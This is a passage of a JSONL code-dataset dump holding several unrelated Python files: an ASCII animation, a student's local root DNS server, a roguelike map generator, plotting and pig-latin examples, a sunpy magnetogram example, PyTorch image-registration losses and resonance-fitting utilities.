time.sleep(5)\n","sub_path":"fang/fang1.py","file_name":"fang1.py","file_ext":"py","file_size_in_byte":1737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"440958384","text":"import os , time\nfiles = [\"1\", \"2\", \"3\", \"4\", \"5\", \"6\", \"7\", \"8\", \"9\", \"10\", \"11\"]\nframes = []\nk = 1\nframes_path = \"./assets/frames/\"\nworking_dir = os.path.dirname(__file__)\n\nfor name in files:\n filepath = frames_path + name\n print(filepath)\n rel_path = os.path.relpath(filepath, working_dir)\n with open(rel_path, \"r\", encoding=\"utf8\") as f:\n #sabe every line in list \"f\"\n f = f.readlines()\n #append list f to list frames\n frames.append(f)\n\nwhile k == 1:\n\n for frame in frames:\n #clear the shell\n os.system('printf \"\\033c\"') #printf \"\\033c\"') \n print(\"\".join(frame))\n #print(\" TEST \")\n time.sleep(0.2)\n #clear the shell\n \n \n","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":721,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"448065545","text":"'''\nName: Carlos Alvarenga\nStudent id: 5197501\nEmail: alvar357@umn.edu\nFilename: root_server.py\nDescription: Program encompasses the functionality of the root DNS server\n programs that either redirects the default local DNS server to the\n appropriate DNS server or directly contacts said DNS server to\n receive the response and send it back to the default local DNS server.\n'''\n\nimport sys\nimport socket\n\ndomains = {} # structure that contains domain ip-port information\n\ndef server_shutdown(sock):\n '''\n Function triggered by user's ctrl-c keyboard interrupt signaling server\n shutdown.Broadcast messages 'shutdown' are sent to all other servers\n notifying them of shutdown and socket connections are closed.\n '''\n print('\\nCommencing root DNS server shutdown')\n\n # Send broadcast message to default local DNS server\n s = socket.socket()\n s.connect(('127.0.0.1', 5352))\n s.send(\"shutdown\")\n s.close()\n\n # Send broadcast messages to remaining DNS servers\n for item in domains:\n s = socket.socket()\n ip = domains.get(item)[0]\n port = domains.get(item)[1]\n s.connect((ip, port))\n s.send(\"shutdown\")\n s.close()\n print('Root DNS server socket closed')\n sock.close()\n\ndef map_domains(filename):\n '''\n Function that maps .com, .org, .gov domains to appropriate port and ip\n numbers based on server.dat file and stores this information in appropriate\n data structure.\n '''\n file = open(filename, \"r\");\n try:\n for line in file:\n line = line.strip(\"\\n\").strip(\"\\r\")\n line = line.split(\" \")\n domains[line[0]] = [line[1].lower(), int(line[2])]\n finally:\n file.close()\n\ndef format_message(is_received, msg, server_id):\n '''\n Function that formats client message to replace id field with the id of the\n current DNS server to adhere to the project write-up template and send the\n message back to another server. The reformatted message is returned.\n '''\n msg_arr = msg.split(\", \")\n if is_received: # message is request from client\n return (server_id + ', ' + msg_arr[1] + ', ' + msg_arr[2])\n else:\n return (msg_arr[0] + ', ' + server_id + ', ' + msg_arr[2])\n\ndef resolve_query(client_msg, server_id):\n '''\n Function that determines whether the client request has to be sent directly\n to the .com, .org or .gov server or it should redirect the default local DNS\n server to one of the three mentioned server. 
The appropriate response\n message string for either case is returned.\n '''\n client_msg_arr = client_msg.split(\", \")\n hostname = client_msg_arr[1].split(\".\")\n domain = hostname[len(hostname)-1].lower()\n dns_server_ip = domains.get(domain)[0]\n dns_server_port = domains.get(domain)[1]\n if (client_msg_arr[2].lower() == 'i'): # iterative request\n return ('0x01, ' + server_id + ', ' + dns_server_ip + ', ' + str(dns_server_port))\n else: # recursive request\n s = socket.socket()\n s.connect((dns_server_ip, dns_server_port))\n print('Connected to DNS server ' + domain)\n s.send(client_msg.encode('utf-8'))\n print('Message sent to DNS server: ' + client_msg)\n response = s.recv(1024).decode('utf-8')\n print('Response received from DNS server: ' + response)\n s.close()\n print('DNS server socket closed')\n return format_message(False, response, server_id)\n\ndef talk_with_server(clientsocket, addr, server_id, shutdown):\n '''\n Function responsible for talking with DNS servers by accepting requests and\n sending out the correct responses. The server shutdown status after\n communication is returned.\n '''\n while True:\n client_msg = clientsocket.recv(1024).decode('utf-8')\n if not client_msg:\n break\n if client_msg == 'shutdown': # recieve broadcast message from another server\n shutdown = True\n break\n print('Message recieved from default local DNS server: ' + client_msg)\n client_msg = format_message(True, client_msg, server_id)\n response = resolve_query(client_msg, server_id)\n clientsocket.send(response.encode('utf-8'))\n print('Response sent to default local DNS server: ' + response)\n clientsocket.close()\n print('Default local DNS socket closed\\n')\n return shutdown\n\ndef server(server_id, server_port, mapping_file, servers_list):\n '''\n Main function where root DNS server connection is set up to recieve and send\n messages and is closed when appropriate.\n '''\n s = socket.socket() # Create a socket object\n ip = '127.0.0.1'\n shutdown = False # Track any existing server shutdown\n\n try:\n s.bind((ip, int(server_port))) # Bind to the port\n s.listen(5) # Now wait for client connection.\n print('Root DNS Server started!')\n print('Waiting for clients...')\n while True and not shutdown:\n c, addr = s.accept() # Establish connection with client.\n print ('Connect to default local DNS server' + str(addr))\n shutdown = talk_with_server(c, addr, server_id, shutdown)\n s.close()\n print('Root DNS server socket closed')\n except KeyboardInterrupt:\n server_shutdown(s)\n\nif __name__ == '__main__':\n map_domains(sys.argv[4])\n server(sys.argv[1], sys.argv[2], sys.argv[3], sys.argv[4])\n","sub_path":"root_server.py","file_name":"root_server.py","file_ext":"py","file_size_in_byte":5528,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"272900419","text":"from character import *\nimport random\n\nclass Tile:\n blocked = True\n characterInTile = None\n token = \"\"\n #a tile of the map and its properties\n def __init__(self):\n self.blocked = False\n self.characterInTile = None\n self.token = \"-\"\n\n def getCharacter(self):\n return self.characterInTile\n\n def setCharacter(self,newCharacter):\n self.characterInTile = newCharacter\n\n def getBlocked(self):\n return self.blocked\n\n def setBlocked(self,blocked):\n self.blocked = blocked\n\n def setToken(self,newToken):\n self.token = newToken\n\n def getToken(self):\n return self.token\n\n def __str__(self):\n return self.token\n\nclass Room:\n xMin = 0\n xMax = 0\n yMin = 0\n 
yMax = 0\n size = 1.0\n prevXMax = 0\n prevYMax = 0\n\n def __init__(self, xMin, xMax, yMin, yMax, size):\n self.xMin = xMin\n self.xMax = xMax\n self.yMin = yMin\n self.yMax = yMax\n self.size = size\n self.prevXMax = xMax\n self.prevYMax = yMax\n\n def __str__(self):\n return \"x:\"+str(self.xMin)+\"-\"+str(self.xMax)+\" y:\"+str(self.yMin)+\"-\"+str(self.yMax)+\" size:\"+str(self.size)\n\n def getXMin(self):\n return self.xMin\n\n def setXMin(self, xMin):\n self.xMin = xMin\n\n def getXMax(self):\n return self.xMax\n\n def setXMax(self, xMax):\n self.xMax = xMax\n\n def getYMin(self):\n return self.yMin\n\n def setYMin(self, yMin):\n self.yMin = yMin\n\n def getYMax(self):\n return self.yMax\n\n def setYMax(self, yMax):\n self.yMax = yMax\n\n def getSize(self):\n return self.size\n\n def setSize(self, size):\n self.size = size\n\n def getPrevXMax(self):\n return self.prevXMax\n\n def setPrevXMax(self, prevXMax):\n self.prevXMax = prevXMax\n\n def getPrevYMax(self):\n return self.prevYMax\n\n def setPrevYMax(self, prevYMax):\n self.prevYMax = prevYMax\n\n def getCenterX(self):\n return self.xMin + int((self.xMax - self.xMin)/2)\n\n def getCenterY(self):\n return self.yMin + int((self.yMax - self.yMin)/2)\n\nclass Map:\n maxHeight = 0\n maxWidth = 0\n\n def __init__(self, l, h, nr):\n self.maxWidth = l\n self.maxHeight = h\n\n def getHeight(self):\n return self.maxHeight\n\n def getWidth(self):\n return self.maxWidth\n\nclass MapOfTiles(Map):\n tiles = []\n\n def __init__(self, w, h, nr):\n Map.__init__(self,w,h,nr)\n roomList = []\n roomList.append(Room(0,self.maxWidth,0,self.maxHeight,1.0))\n for i in range(0, self.maxHeight):\n newTileList = []\n for j in range(0, self.maxWidth):\n newTile = Tile()\n newTileList.append(newTile)\n self.tiles.append(newTileList)\n if(nr > 0):\n for i in range(1, nr):\n largestRoomSize = 0\n largestRoomNum = 0\n for roomNum in range(0, len(roomList)):\n if roomList[roomNum].getSize() > largestRoomSize:\n largestRoomSize = roomList[roomNum].getSize()\n largestRoomNum = roomNum\n # split vertically\n # print(roomList[largestRoomNum])\n if((roomList[largestRoomNum].getXMax() - roomList[largestRoomNum].getXMin()) >= (roomList[largestRoomNum].getYMax() - roomList[largestRoomNum].getYMin())):\n # print(\"dividing X axis\")\n roomList[largestRoomNum].setPrevXMax(roomList[largestRoomNum].getXMax())\n roomList[largestRoomNum].setXMax(int((roomList[largestRoomNum].getXMax() - roomList[largestRoomNum].getXMin())/2) + roomList[largestRoomNum].getXMin())\n roomList[largestRoomNum].setSize(roomList[largestRoomNum].getSize() / 2)\n roomList.append(Room(roomList[largestRoomNum].getXMax()+1, roomList[largestRoomNum].getPrevXMax(), roomList[largestRoomNum].getYMin(), roomList[largestRoomNum].getYMax(), roomList[largestRoomNum].getSize()))\n # split horizontally\n else:\n # print(\"dividing Y axis\")\n roomList[largestRoomNum].setPrevYMax(roomList[largestRoomNum].getYMax())\n roomList[largestRoomNum].setYMax(int((roomList[largestRoomNum].getYMax() - roomList[largestRoomNum].getYMin())/2) + roomList[largestRoomNum].getYMin())\n roomList[largestRoomNum].setSize(roomList[largestRoomNum].getSize() / 2)\n roomList.append(Room(roomList[largestRoomNum].getXMin(), roomList[largestRoomNum].getXMax(), roomList[largestRoomNum].getYMax() + 1, roomList[largestRoomNum].getPrevYMax(), roomList[largestRoomNum].getSize()))\n\n for room in roomList:\n # print(room)\n # print(\"center of room X:\" + str(room.getCenterX()) + \"Y:\" + str(room.getCenterY()))\n yMinBound = 
random.randint(room.getYMin(),room.getCenterY())-1\n yMaxBound = random.randint(room.getCenterY()+2,room.getYMax())\n # print(\"Y room size:\" + str(yMinBound) + \"-\" + str(yMaxBound))\n xMinBound = random.randint(room.getXMin(), room.getCenterX())-1\n xMaxBound = random.randint(room.getCenterX()+2,room.getXMax())\n # print(\"X room size:\" + str(xMinBound) + \"-\" + str(xMaxBound))\n for i in range(yMinBound, yMaxBound):\n self.tiles[i][xMaxBound-1].setToken(\"#\")\n self.tiles[i][xMaxBound-1].setBlocked(True)\n self.tiles[i][xMinBound].setToken(\"#\")\n self.tiles[i][xMinBound].setBlocked(True)\n for j in range(xMinBound, xMaxBound):\n self.tiles[yMaxBound-1][j].setToken(\"#\")\n self.tiles[yMaxBound-1][j].setBlocked(True)\n self.tiles[yMinBound][j].setToken(\"#\")\n self.tiles[yMinBound][j].setBlocked(True)\n for i in range(0, self.maxHeight):\n # print(self.maxWidth-2)\n # print(i)\n self.getTile(i,self.maxWidth-1).setToken(\"#\")\n self.getTile(i,self.maxWidth-1).setBlocked(True)\n self.getTile(i,0).setToken(\"#\")\n self.getTile(i,0).setBlocked(True)\n for i in range(0, self.maxWidth):\n self.getTile(self.maxHeight-1,i).setToken(\"#\")\n self.getTile(self.maxHeight-1,i).setBlocked(True)\n self.getTile(0,i).setToken(\"#\")\n self.getTile(0,i).setBlocked(True)\n\n def getTile(self,y,x):\n # print(x)\n # print(y)\n return self.tiles[y][x]\n\n # return 1 if successful insert, 0 otherwise\n def insertCharacter(self, y, x, newCharacter):\n if(self.getTile(y,x).getBlocked() == True):\n return 0\n else:\n # print(str(y) + \":\" + str(x))\n self.getTile(y,x).setCharacter(newCharacter)\n self.getTile(y,x).setBlocked(True)\n return 1\n\n def removeCharacter(self, charToRemove):\n yx = self.getPlayerLocation(charToRemove)\n self.getTile(yx[0],yx[1]).setCharacter(None)\n self.getTile(yx[0],yx[1]).setBlocked(False)\n\n def getDirectionToCharacter(self, baseChar, targetChar):\n yxb = self.getPlayerLocation(baseChar)\n yxt = self.getPlayerLocation(targetChar)\n # print(\"base char \" + str(yxb))\n # print(\"target char \" + str(yxt))\n if(yxb[0] < yxt[0] and yxb[1] > yxt[1]):\n return 1\n if(yxb[0] < yxt[0] and yxb[1] == yxt[1]):\n return 2\n if(yxb[0] < yxt[0] and yxb[1] < yxt[1]):\n return 3\n if(yxb[0] == yxt[0] and yxb[1] > yxt[1]):\n return 4\n if(yxb[0] == yxt[0] and yxb[1] < yxt[1]):\n return 6\n if(yxb[0] > yxt[0] and yxb[1] > yxt[1]):\n return 7\n if(yxb[0] > yxt[0] and yxb[1] == yxt[1]):\n return 8\n if(yxb[0] > yxt[0] and yxb[1] < yxt[1]):\n return 9\n\n def isCharacterAdjacentToTile(self, py, px, target):\n retVal = False\n for y in range(py - 1, py + 1):\n for x in range(px-1, px + 1):\n if(x < 0 or x > self.maxWidth - 1 or y < 0 or y > self.maxHeight - 1):\n pass\n elif(self.getTile(y,x).getCharacter() != None):\n if(self.getTile(y,x).getCharacter().getID() == target.getID()):\n retVal = True\n break\n return retVal\n\n def isCharacterInRangeOfCharacter(self, baseChar, targetChar, rangeModifier):\n yxb = self.getPlayerLocation(baseChar)\n yxt = self.getPlayerLocation(targetChar)\n yInRange = False\n xInRange = False\n if((yxb[0] >= yxt[0]-rangeModifier) and (yxb[0] <= yxt[0]+rangeModifier)):\n yInRange = True\n if((yxb[1] >= yxt[1]-rangeModifier) and (yxb[1] <= yxt[1]+rangeModifier)):\n xInRange = True\n if(xInRange == True and yInRange == True):\n return True\n else:\n return False\n\n def isCharacterAdjacentToCharacter(self, baseChar, targetChar):\n yxb = self.getPlayerLocation(baseChar)\n yxt = self.getPlayerLocation(targetChar)\n yInRange = False\n xInRange = False\n if((yxb[0] >= 
yxt[0]-1) and (yxb[0] <= yxt[0]+1)):\n            yInRange = True\n        if((yxb[1] >= yxt[1]-1) and (yxb[1] <= yxt[1]+1)):\n            xInRange = True\n        if(xInRange == True and yInRange == True):\n            return True\n        else:\n            return False\n\n    # creates yxpair with absolute value between two chars\n    def getDistanceTo(self, initChar, toChar):\n        yx1 = self.getPlayerLocation(initChar)\n        yx2 = self.getPlayerLocation(toChar)\n        yDist = abs(yx2[0] - yx1[0])\n        xDist = abs(yx2[1] - yx1[1])\n        return [yDist, xDist]\n\n    def getVisibleChars(self, characterLooking, sightDistance):\n        listOfCharactersFound = []\n        yxpair = self.getPlayerLocation(characterLooking)\n        chary = yxpair[0]\n        charx = yxpair[1]\n        for y in range(chary - sightDistance, chary + sightDistance):\n            for x in range(charx - sightDistance, charx + sightDistance):\n                # print(\"maxX:\" + str(self.maxWidth) + \" maxY:\" + str(self.maxHeight))\n                # print(\"X:\" + str(x) + \" Y:\" + str(y))\n                if(x < 0 or x > self.maxWidth - 1 or y < 0 or y > self.maxHeight - 1):\n                    pass\n                    # print(\"skipped\")\n                elif(self.getTile(y,x).getCharacter() != None):\n                    foundChar = self.getTile(y,x).getCharacter()\n                    # we found a character in range\n                    # check to make sure it isn't the player\n                    if(characterLooking.getID() == foundChar.getID()):\n                        continue\n                    # print(\"character in range: \" + str(foundChar.getID()) + \"[\" + str(y) + \",\" + str(x) + \"]\")\n\n                    # find distance between two characters\n                    distPair = self.getDistanceTo(characterLooking, foundChar)\n                    # print(distPair)\n                    xStepAmount = 0\n                    yStepAmount = 0\n                    xStepAt = 0\n                    yStepAt = 0\n                    xStepCounter = 0\n                    yStepCounter = 0\n                    if(distPair[0] != 0 and distPair[1] != 0):\n                        if(distPair[0] > distPair[1]):\n                            xStepAt = int(round(distPair[0]/distPair[1] + 0.01))\n                        elif(distPair[0] < distPair[1]):\n                            yStepAt = int(round(distPair[1]/distPair[0] + 0.01))\n                    # print(\"xStepAt: \" + str(xStepAt))\n                    # print(\"yStepAt: \" + str(yStepAt))\n\n                    # figure out the stepAmount\n                    if(chary < y and charx < x):\n                        yStepAmount += 1\n                        xStepAmount += 1\n                    elif(chary < y and charx > x):\n                        yStepAmount += 1\n                        xStepAmount -= 1\n                    elif(chary > y and charx > x):\n                        yStepAmount -= 1\n                        xStepAmount -= 1\n                    elif(chary > y and charx < x):\n                        yStepAmount -= 1\n                        xStepAmount += 1\n                    elif(chary == y and charx > x):\n                        xStepAmount -= 1\n                    elif(chary == y and charx < x):\n                        xStepAmount += 1\n                    elif(chary < y and charx == x):\n                        yStepAmount += 1\n                    elif(chary > y and charx == x):\n                        yStepAmount -= 1\n\n                    checky = chary\n                    checkx = charx\n                    canSee = True\n                    while(1):\n                        if(checkx == x and checky == y):\n                            break\n                        # \"close enough\" check\n                        if((checkx == x+1 and checky == y) or (checkx == x-1 and checky == y) or (checky == y+1 and checkx == x) or (checky == y-1 and checkx == x)):\n                            break\n                        if(xStepCounter == 0):\n                            checkx += xStepAmount\n                            xStepCounter = 0\n                        if(yStepCounter == 0):\n                            checky += yStepAmount\n                            yStepCounter = 0\n                        xStepCounter += 1\n                        yStepCounter += 1\n                        if(xStepCounter >= xStepAt):\n                            xStepCounter = 0\n                        if(yStepCounter >= yStepAt):\n                            yStepCounter = 0\n                        # self.getTile(checky, checkx).setToken(\"x\")\n                        if(self.getTile(checky, checkx).getBlocked() == True):\n                            if(self.getTile(checky, checkx).getCharacter() != foundChar):\n                                # print(str(checky) + \",\" + str(checkx) + \" is blocked\")\n                                canSee = False\n                                break\n\n\n                    if(canSee == True):\n                        listOfCharactersFound.append(self.getTile(y,x).getCharacter())\n        return listOfCharactersFound\n\n    def getPlayerLocation(self, charToFind):\n        for y in range(0, self.maxHeight):\n            for x in range(0, self.maxWidth):\n                if(self.getTile(y,x).getCharacter() == charToFind):\n                    return [y,x]\n\n    def 
getClosestCharacter(self, baseChar, listOfChars):\n closestChar = None\n closestDist = 0\n for checkChar in listOfChars:\n yx = self.getDistanceTo(baseChar, checkChar)\n dist = (((yx[0]**2) + (yx[1]**2))**(1/2))\n if(closestChar == None):\n closestChar = checkChar\n closestDist = dist\n elif(dist < closestDist):\n closestChar = checkChar\n closestDist = dist\n return closestChar\n\n # return 1 on successful move, 0 on a fail\n def moveCharacter(self, movingChar, direction):\n # print(\"moving \" + str(movingChar) + \" in direction \" + str(direction))\n yx = self.getPlayerLocation(movingChar)\n tileOfMovingChar = self.getTile(yx[0],yx[1])\n canMove = False\n newX = 0\n newY = 0\n # like keypad (5 is char loc)\n # 7 8 9\n # 4 5 6\n # 1 2 3\n # down and left\n if(direction == 1):\n newY = yx[0]+1\n newX = yx[1]-1\n # down\n if(direction == 2):\n newY = yx[0]+1\n newX = yx[1]\n # down and right\n if(direction == 3):\n newY = yx[0]+1\n newX = yx[1]+1\n # left\n if(direction == 4):\n newY = yx[0]\n newX = yx[1]-1\n # not moving always results in a sucessful move, and no more work needs to be done\n if(direction == 5):\n return 1\n # right\n if(direction == 6):\n newY = yx[0]\n newX = yx[1]+1\n # up and left\n if(direction == 7):\n newY = yx[0]-1\n newX = yx[1]-1\n # up\n if(direction == 8):\n newY = yx[0]-1\n newX = yx[1]\n # up and right\n if(direction == 9):\n newY = yx[0]-1\n newX = yx[1]+1\n if((newY < self.getHeight()-1 and newY > 0) and (newX < self.getWidth()-1 and newX > 0)):\n newTile = self.getTile(newY, newX)\n # print(newTile.getBlocked())\n if(newTile.getBlocked() == False):\n newTile.setCharacter(tileOfMovingChar.getCharacter())\n newTile.setBlocked(True)\n tileOfMovingChar.setCharacter(None)\n tileOfMovingChar.setBlocked(False)\n return 1\n else:\n return 0\n else:\n return 0\n","sub_path":"core/maps.py","file_name":"maps.py","file_ext":"py","file_size_in_byte":17140,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"83052043","text":"import matplotlib.pyplot as plt \nimport numpy as np\n\nx = np.linspace(-3,3,50)\ny1 = 2*x +1\ny2 = x**2\n\n\nplt.figure(num=5,figsize=(6,4))\nplt.plot(x,y1)\nplt.plot(x,y2,color='red',linewidth=1.0,linestyle='--')\n\nplt.xlim((-1,2))\nplt.ylim((-2,3))\n\nplt.xlabel('this is x')\nplt.ylabel('this is y')\n\nnew_ticks = np.linspace(-1,2,5)\nplt.xticks(new_ticks)\nplt.yticks([-2,-1.6,-1,1.22,3],\n\t\t\t['terrible','bad','normal',r'$beta$',r'$\\alpha$'])\n\n#gca = 'get curretn axis'\nax = plt.gca()\nax.spines['right'].set_color('none')\nax.spines['top'].set_color('none')\nax.xaxis.set_ticks_position('bottom')\nax.yaxis.set_ticks_position('left')\nax.spines['bottom'].set_position(('data',-1))\nax.spines['left'].set_position(('data',0))\n\nplt.show()\n\n","sub_path":"Machine Learning - Mofan/Matplotlib-莫凡/matplotlib-19讲/6.坐标轴设置二.py","file_name":"6.坐标轴设置二.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"251296863","text":"\"\"\"\nVery hard mode\nComplete all requirements of Hard Mode, as well as giving your program the ability to read in a pig latin string\n and output a plain english sentence. 
Replace first vowel characters with a \"_\".\n\"\"\"\n\n\ndef translate_word(word):\n if word[0] in \"aeiou\":\n return word[1:] + \"say\"\n else:\n return \"{}{}ay\".format(word[1:], word[0])\n\n\ndef convert_to_pyglatin(writing):\n new_writing = []\n for word in writing.split():\n new_writing.append(translate_word(word.lower()))\n return \" \".join(new_writing)\n\n\ndef back_to_english(writing):\n new_writing = []\n for word in writing.split():\n word = word.lower()\n if word[-3:] == \"say\":\n new_writing.append(\"_\" + word[:-3])\n else:\n new_writing.append(\"{}{}\".format(word[-3], word[:-3]))\n return \" \".join(new_writing)\n\n\nwriting = input(\"Please enter some text: \").lower()\n\noption = input(\"\"\"\nWhat do you want to do?\na)convert English to Pyglatin\nb)convert Pyglatin to English\n\"\"\").lower()\n\nif option == 'a':\n print(convert_to_pyglatin(writing))\nelif option == 'b':\n print(back_to_english(writing))\nelse:\n print(\"Not a valid option\")\n","sub_path":"pyglatin_veryhard.py","file_name":"pyglatin_veryhard.py","file_ext":"py","file_size_in_byte":1175,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"296875655","text":"\"\"\"\n==========================================================\nOverplotting SRS active region locations on a magnetograms\n==========================================================\n\nHow to find and plot the location of an active region on an HMI magnetogram.\n\"\"\"\nimport matplotlib.pyplot as plt\nimport numpy as np\n\nfrom astropy.coordinates import SkyCoord\n\nimport sunpy.coordinates\nimport sunpy.data.sample\nimport sunpy.map\nfrom sunpy.io.special import srs\n\n##############################################################################\n# For this example, we will start with the sample data. We need an HMI file and\n# use it to create a map, and the SRS table which contains a list of active\n# regions. Both of these data can be downloaded with ``Fido``.\n\nsmap = sunpy.map.Map(sunpy.data.sample.HMI_LOS_IMAGE)\nsrs_table = srs.read_srs(sunpy.data.sample.SRS_TABLE)\n\n##############################################################################\n# We only need the rows which have 'ID' = 'I' or 'IA'.\n# Some tables do not have these columns, so we exit the script if they are not\n# present.\n\nif 'I' in srs_table['ID'] or 'IA' in srs_table['ID']:\n srs_table = srs_table[np.logical_or(srs_table['ID'] == 'I',\n srs_table['ID'] == 'IA')]\nelse:\n raise ValueError(\"No I or IA entries for this date.\")\n\n##############################################################################\n# Now we extract the latitudes, longitudes and the region numbers. 
We make an\n# empty list if there are no ARs.\n\nif srs_table is not None:\n lats = srs_table['Latitude']\n lngs = srs_table['Longitude']\n numbers = srs_table['Number']\nelse:\n lats = lngs = numbers = []\n\n##############################################################################\n# Let's plot the results by defining coordinates for each location.\n\nax = plt.subplot(projection=smap)\nsmap.plot(vmin=-120, vmax=120)\nsmap.draw_limb()\nax.set_autoscale_on(False)\n\nif len(lats) > 0:\n c = SkyCoord(lngs, lats, frame=\"heliographic_stonyhurst\")\n ax.plot_coord(c, 'o')\n\n for i, num in enumerate(numbers):\n ax.annotate(num, (lngs[i].value, lats[i].value),\n xycoords=ax.get_transform('heliographic_stonyhurst'),\n color='red',\n fontweight='bold',\n )\n\nplt.show()\n","sub_path":"examples/plotting/magnetogram_active_regions.py","file_name":"magnetogram_active_regions.py","file_ext":"py","file_size_in_byte":2337,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"638146434","text":"\"\"\"Loss functions\"\"\"\n\nimport torch\nimport torch.nn as nn\n\nfrom model.submodules import resample_transform\n\ndef diffusion_loss(dvf):\n \"\"\"\n Calculate diffusion loss as a regularisation on the displacement vector field (DVF)\n\n Args:\n dvf: (Tensor of shape (N, 2, H, W)) displacement vector field estimated\n\n Returns:\n diffusion_loss_2d: (Scalar) diffusion regularisation loss\n \"\"\"\n\n # spatial derivatives\n dvf_dx = dvf[:, :, 1:, 1:] - dvf[:, :, :-1, 1:] # (N, 2, H-1, W-1)\n dvf_dy = dvf[:, :, 1:, 1:] - dvf[:, :, 1:, :-1] # (N, 2, H-1, W-1)\n return (dvf_dx.pow(2) + dvf_dy.pow(2)).mean()\n\n##############################################################################################\n# --- Huber loss --- #\n##############################################################################################\n\ndef huber_loss_spatial(dvf):\n \"\"\"\n Calculate approximated spatial Huber loss\n Args:\n dvf: (Tensor of shape (N, 2, H, W)) displacement vector field estimated\n\n Returns:\n loss: (Scalar) Huber loss spatial\n\n \"\"\"\n eps = 1e-8 # numerical stability\n\n # spatial derivatives\n dvf_dx = dvf[:, :, 1:, 1:] - dvf[:, :, :-1, 1:] # (N, 2, H-1, W-1)\n dvf_dy = dvf[:, :, 1:, 1:] - dvf[:, :, 1:, :-1] # (N, 2, H-1, W-1)\n return ((dvf_dx.pow(2) + dvf_dy.pow(2)).sum(dim=1) + eps).sqrt().mean()\n\n\ndef huber_loss_temporal(dvf):\n \"\"\"\n Calculate approximated temporal Huber loss\n\n Args:\n dvf: (Tensor of shape (N, 2, H, W)) displacement vector field estimated\n\n Returns:\n loss: (Scalar) huber loss temporal\n\n \"\"\"\n eps = 1e-8 # numerical stability\n\n # magnitude of the dvf\n dvf_norm = torch.norm(dvf, dim=1) # (N, H, W)\n\n # temporal derivatives, 1st order\n dvf_norm_dt = dvf_norm[1:, :, :] - dvf_norm[:-1, :, :]\n loss = (dvf_norm_dt.pow(2) + eps).sum().sqrt()\n return loss\n\n\n# --- construct the loss function --- #\nsim_losses = {\"MSE\": nn.MSELoss()}\nreg_losses = {\"huber_spt\": huber_loss_spatial,\n \"diffusion\": diffusion_loss}\n\n\ndef loss_fn(dvf, target, source, params):\n \"\"\"\n Unsupervised loss function\n\n Args:\n dvf: (Tensor, shape Nx2xHxW) predicted displacement vector field\n target: (Tensor, shape NxchxHxW) target image\n source: (Tensor, shape NxchxHxW) source image\n params: (object) model parameters\n\n Returns:\n loss: (scalar) loss value\n losses: (dict) dictionary of individual losses (weighted)\n \"\"\"\n\n # warp the source image towards target using grid resample (spatial transformer)\n # i.e. 
dvf is from target to source\n warped_source = resample_transform(source, dvf)\n\n sim_loss = sim_losses[params.sim_loss](target, warped_source)\n reg_loss = reg_losses[params.reg_loss](dvf) * params.reg_weight\n\n loss = sim_loss + reg_loss\n losses = {params.sim_loss: sim_loss, params.reg_loss: reg_loss}\n\n return loss, losses\n","sub_path":"cardiac_motion/model/losses.py","file_name":"losses.py","file_ext":"py","file_size_in_byte":2940,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"134284953","text":"import numpy as np\nfrom scipy import stats\nimport matplotlib.pyplot as plt\nfrom scipy.interpolate import interp1d\nfrom uncertainties import umath\nfrom uncertainties import unumpy\nfrom uncertainties import ufloat\n\ndef find_nearest_idx(array,value):\n idx = (np.abs(array-value)).argmin()\n return idx\n\ndef lin_to_dB(y):\n return 10*np.log10(y)\n\ndef guess_fo(f, gamma2):\n ind_fo = np.argmin(gamma2) #find index of resonant frequency\n return f[ind_fo]\n\ndef guess_offset(y):\n low_filt_perc = 0.33\n y_filtered = stats.trim1(y, low_filt_perc, tail = 'left') #cut out bottom low_filt_perc of y values. Basically want to filter out the notch a bit.\n return np.median(y_filtered)\n\ndef guess_dy(y):\n return guess_offset(y) - np.min(y) \n\ndef guess_q(f, y):\n ind_fc = np.argmin(y) #find index of resonant frequency\n fc = f[ind_fc] #obtain resonant frequency\n\n #look at the left of the resonance\n left_f = f[:ind_fc] \n left_y = y[:ind_fc] \n dy = guess_dy(y)\n ind_fwhm = find_nearest_idx(left_y, dy/2)\n\n #find distance between fwhm and resonance\n f1 = f[ind_fwhm]\n #guess bandwidth as twice that distance\n del_f = 2*(fc-f1)\n Q_guess = fc/del_f\n return Q_guess\n\n\ndef guess_reflection_fit_params(f, gamma2):\n fo_guess = guess_fo(f, gamma2)\n Q_guess = guess_q(f, gamma2)\n dy_guess = guess_dy(gamma2)\n C_guess = guess_offset(gamma2)\n return fo_guess, Q_guess, dy_guess, C_guess\n\n \ndef func_pow_reflected(f, fo, Q, del_y, C):\n return -(fo/(2*Q))**2*del_y/((f-fo)**2+(fo/(2*Q))**2)+C\n\ndef plot_mag_phase( x, ymag, yphase):\n fig, ax1 = plt.subplots()\n \n color = 'tab:red'\n ax1.set_xlabel('Frequency (MHz)')\n ax1.set_ylabel(r'$|\\Gamma|$', color=color)\n ax1.plot(x, ymag, color=color)\n ax1.tick_params(axis='y', labelcolor=color)\n \n ax2 = ax1.twinx() # instantiate a second axes that shares the same x-axis\n \n color = 'tab:blue'\n ax2.set_ylabel(r'$\\angle \\Gamma$ ', color=color) # we already handled the x-label with ax1\n ax2.plot(x, yphase, color=color)\n ax2.tick_params(axis='y', labelcolor=color)\n \n fig.tight_layout() # otherwise the right y-label is slightly clipped\n \n\ndef get_arr_ends(x, n_end_elements):\n return np.concatenate([x[:n_end_elements],x[-n_end_elements:]])\n\ndef deconvolve_transmission(f, gamma_mag, gamma_phase, C_fit):\n gamma_cav_mag = gamma_mag*np.sqrt(1/C_fit)\n\n interp_phase = interp1d(f, gamma_phase, kind='cubic')\n f_ends = get_arr_ends(f, 5)\n phase_ends = get_arr_ends(gamma_phase, 5)\n# interp_phase_wo_notch = interp1d(f_ends, phase_ends, kind='linear')\n interp_phase_wo_notch = np.poly1d(np.polyfit(f_ends, phase_ends, 1))\n del_phase_line = 